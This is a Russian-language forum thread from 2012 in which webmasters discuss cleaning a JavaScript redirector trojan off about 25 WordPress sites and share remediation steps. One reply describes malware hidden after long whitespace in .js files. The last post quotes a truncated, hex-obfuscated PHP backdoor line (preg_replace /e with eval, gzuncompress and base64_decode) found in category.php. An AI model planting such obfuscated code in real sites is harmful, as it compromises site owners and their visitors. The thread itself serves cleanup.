Trojan.JS.Redirector.ue

superbiz · 15.02.2012, 00:59

кто сталкивался как лечить вордресс, около 25 сайтов на вордпресс шаватили ету гадость, определяут не все антивиры, каспер нашел при открытии, бросер начал матерится дня три назад, яндекс вебмастерс уже отметил у себя что сайты могут навредить компу, кто что слышал или пробовал?
Гуглил, ненашел

triangulum · 15.02.2012, 06:39

а что никаких файлов нету на хосте?

superbiz · 15.02.2012, 13:10

Сообщение от triangulum

а что никаких файлов нету на хосте?

лишних файлов не нашел, потустороннего кода в пхпшках тоже вроде нет или ненашел, обсерфил вес инет, решения пока тоже нет. На форумах фрилансеров есть предложения убрать этого зверя от 50 до 250 уе за сайт. Мне дороговато выходит

triangulum · 15.02.2012, 18:47

ну возможно комп ваш заражен....а если wordpress то полюбому есть где то лишний файл или в каком то файле код подправлен...других вариантов быть не может....надо все файлы везде проверить.... от wp-admin до wp-content, короче везде надо...

**Kiro** · 15.02.2012, 19:16

ищи зашифрованный код, если нет явного

hazehog · 15.02.2012, 19:20

скачиваете на локальный комп содержимое хоста да программкой для сравнения (есть на даунлоадком) сравниваете файлики

чего проще?

hazehog · 15.02.2012, 19:22

хотя может джаваскрипт вирус в текстах в базе данных

AndyName · 15.02.2012, 19:29

Сталкивался не с конкретно этим зверем, но с кем-то из его семейства JS троянов.

В общем смотрите файлы .js

В моём случае был зашифрованный текст в конце почти всех .js файлов и в темах оформления тоже. Причем так сразу и не заметишь, т.к. сильный отступ слева. Смотрите на нижний ползунок прокрутки.

Т.к. фигня поразила почти все .js файлы моего вордпресса, то я сделал следующее:
- сменил пароль на аккаунт хостинга
- сохранил папку ворпресса с контентом и конфиги
- снёс всё нафиг
- установил вордпресс заново
- проверил касперычем, что в сохранённой папке с контентом нету этого зверя
- заменил конфиг и папку с контентом на сохранённые

Проблема была решена.

AndyName · 15.02.2012, 19:31

Ах да... Базу данных не сносил, просто поменял пароль доступа к ней и обновил эту инфу в конфиге после всех действий, описанных выше.

superbiz · 15.02.2012, 20:34

на гофаке один умелец помог найти, может кому поможет , нашел мне на двух сайтах в wp-includes/category.php первой строчкой дрянь была, так что если у кого есть тоже посмотрите там - остальные пока ищу

code

PHP код:


			
preg_replace(" /.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x6 2\x61\x73\x65\x36\x3 4\x5F\x64\x65\x63\x6F\x64\x65\x28\x6 9\x6D\x70\x6C\x6F\x64\x65\x28

Разделы
Обсуждение доменных имён	Рыночные форумы	Дизайн и развитие проектов	Поисковая оптимизация, SEO и SMM	Отдыхаем
Обсуждение доменных имён и регистраторов	Подарю домен	Обсуждение веб-дизайна	Социальные инструменты	Барахолка
⋅Аукционы	Продам домен - конкретная цена	Оценка дизайна, отзывы	Поисковые системы и каталоги	Комната отдыха
⋅Обсуждение доменных имён и регистраторов IDN и РФ	⋅Домены в зоне .RU (Продам - конкретная цена)	Искусственный интеллект	⋅Яндекс	DomenForum - Замечания и предложения
⋅Обсуждение доменных имён и регистраторов newTLD	⋅Домены в зоне .РФ и IDN (Продам - конкретная цена)	Программирование	⋅Google	Отзывы пользователей
Оценка доменных имён	Продам домен - Аукцион	Графический дизайн	⋅Каталоги
⋅Оценка IDN и РФ	⋅Домены в зоне .RU (Аукцион)	Начинающему веб-мастеру
⋅Оценка доменов в newTLD	⋅Домены в зоне .РФ и IDN (Аукцион)
Для новичков домен-индустрии	Продам домен - выслушаю предложения
Новости домен-индустрии	⋅Домены в зоне .RU (Выслушаю предложения)
⋅Другие полезные новости	⋅Домены в зоне .РФ и IDN (Выслушаю предложения)
Правовые вопросы	Куплю домен
Монетизация доменов	⋅Куплю домен за сумму до ~100$
	⋅Куплю .РФ или IDN домен
	Продам/Kуплю готовый сайт
	⋅Сателлиты и варез
	⋅Сайты на бесплатном хостинге
	⋅Покупка/Продажа контента
	Хостинг Предложения/Спрос
	Купля, продажа, обмен ссылками
	⋅Покупка
	⋅Продажа
	⋅Обмен
	⋅Размещение статей
	Финансы, кредиты, обмен валют, инвестиции
	Реклама
	⋅Вакансии
	⋅Каталоги
	⋅Регистрация в каталогах

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)